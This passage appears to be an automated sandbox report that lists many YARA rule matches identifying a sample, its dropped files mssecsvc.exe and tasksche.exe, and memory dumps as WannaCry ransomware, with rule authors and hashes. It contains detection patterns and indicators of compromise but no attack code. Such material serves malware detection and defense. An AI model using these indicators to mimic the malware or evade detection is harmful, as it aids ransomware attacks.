                Source: Yara matchFile source: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.486435821.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.382876162.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.390959066.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.385586477.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.392159166.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.384164421.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.381472054.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 1504, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 3296, type: MEMORYSTR
                Source: Yara matchFile source: C:\Windows\mssecsvc.exe, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: HFKDS6VcNO.dll, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: HFKDS6VcNO.dll, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000000.383003497.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000013.00000000.463303050.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000000.384240153.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.388277654.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.392238630.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000006.00000000.386126124.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 00000004.00000000.385681867.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                PE file has a writeable .text section
                Source: mssecsvc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: HFKDS6VcNO.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                Source: HFKDS6VcNO.dll, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: HFKDS6VcNO.dll, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 19.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                Source: 9.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
